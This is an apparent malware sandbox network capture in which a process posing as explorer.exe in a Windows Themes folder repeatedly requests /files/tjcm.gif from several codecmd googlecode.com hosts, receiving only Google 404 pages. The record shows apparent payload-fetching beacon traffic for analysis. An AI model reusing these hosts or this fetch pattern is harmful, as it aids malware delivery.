                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:15.760360956 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.549739108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:16.595129013 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:17.325459003 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:17 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:17.325486898 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.54974074.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:18.297791958 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:18.998254061 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:18 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:18.998306990 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.549741108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:19.925789118 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:20.651966095 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:20 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:20.652204037 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.549742108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:21.392455101 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:22.111816883 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:22 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:22.111880064 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.54974374.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:22.790946007 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:23.815599918 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:23 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:23.815628052 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:14:23.815639973 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:14:23.816184998 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:23 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.549744108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:24.750718117 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:25.490860939 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:25 GMT
